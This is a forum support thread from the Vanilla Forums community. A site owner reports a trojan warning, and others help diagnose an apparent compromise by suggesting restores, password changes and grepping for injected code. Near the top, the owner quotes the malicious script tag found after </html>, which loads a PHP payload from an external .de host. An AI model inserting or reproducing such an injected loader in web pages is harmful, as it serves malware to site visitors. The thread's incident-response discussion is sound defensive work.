PC compromised
When I visited my forum today, a security popup from my Avast! security system on my PC appeared saying my forum has a trojan detected on it.
And the page speed is mind-blowingly slow; the first time I loaded it, it sat for 5 minutes waiting on some request from a .de website...
So I checked out my source code, and I found some code after my </html> tag...
</body></html><script type="text/javascript" src="http:// babsy. cwsurf.de/sicherung/Utherverse/hwhbfxcl.php?id=2332630"></script>
I didn't place that there, and I also can't find it in my default.master.tpl or anywhere else...
What is this? The last thing I did was update from 2.1.3 to 2.1.5....
The website is tattootalk.nl (so, let's be careful: my computer says it has a trojan, but it does not block the entire website...)
Anyone?
Answers
Are you using any insecure plugins that you have been told not to use? Or using cleditor in an insecure way?
Perhaps your computer is infected and you infected your forum.
Ask your host if they can see how you were infected. They provide support relating to this.
the "free advice" I can give.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
Yes, I'm using that poll plugin?
Something strange happened!!! My Shoutbox doesn't work anymore.......... I didn't change anything for at least a week and everything worked smoothly yesterday.
Ask your host to restore, only use secure versions of Vanilla software, clean your local PC, and don't use insecure plugins.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
Shit! But who says it comes from either the shoutbox or the poll plugin?
I can't get rid of it; I disabled them both but the code is still there after the </html> tag.
My host to restore? Can they do that?
It could be, as peregrine says, that your computer or some other computer that has access to your server is infected and then uploaded the payload, piggybacking on your session. This is particularly a possibility if you keep getting reinfected.
Post an example of the code. Does it have base64_decode, eval, etc.? Or, in general, your server security is compromised, then you can .
There were a couple of very serious security vulnerabilities in Linux systems that could be used to do pretty much anything if they didn't update the OS.
I doubt it is from XSS in the forum software itself; I know a fair bit about this.
grep is your friend.
You are almost certainly going to need to replace all those files, but if you don't find the source you may be infected again.
If your file permissions are set correctly, then the infection is more likely to be using you, or someone with your level of privileges, to infect the files.
grep is your friend.
I can't get the code in here so I'm posting an image.
This script tag after the html gets included on every page... but I don't know if that's the trojan, because my trojan warning says something like 3842349library{gzip}, but I don't get that trojan message anymore, only the first time I loaded the site...
I'm using Windows XP, SP3... is that important? My computer scan says there are no infections or anything on my PC.
Yes, your files are likely infected.
Try looking in files such as
index.php
and compare with a clean copy.
grep is your friend.
If you find it, can you please not screenshot it. Instead put the code like so
Screen shots of text drive me up the wall.
grep is your friend.
I don't know why you are changing the discussion title.
If your goal is to bring your forum back,
you need to re-install version 2.1.5, provided you are not re-infecting your host from your local PC.
If you don't have a trojan or virus, reinstalling 2.1.5 won't hurt.
As well as that, talk to your host about server OS vulnerabilities, as x00 suggested.
If your goal is to find out what may have happened, zip up your forum folder and explore it later, being careful not to re-infect.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
@Linc can you change the title of this discussion to something more descriptive. Thanks
grep is your friend.
WOW, I didn't change that!!!!!!
I didn't change that title! What is going on, is my PC infected?
Perhaps someone now has your login name and password for Vanilla Forums, if a moderator didn't change the title and you didn't.
I suggest that after you bring your forum back online, you change all passwords to the database as well as the admin passwords. And if someone has compromised your login and passwords for other sites, change them as well.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.
Well, it is pasted in. That is hgtonight's email. See
https://github.com/hgtonight/Vanilla-Plugins/blob/master/BlanderBlog/class.blanderblog.plugin.php
grep is your friend.
I didn't change it to PC compromised either!!!!!!!
I edited the title as requested by x00. Calm down.
I changed my password here on the site.
But who edited it to hgtonight's email address is the big question.
I may not provide the completed solution you might desire, but I do try to provide honest suggestions to help you solve your issue.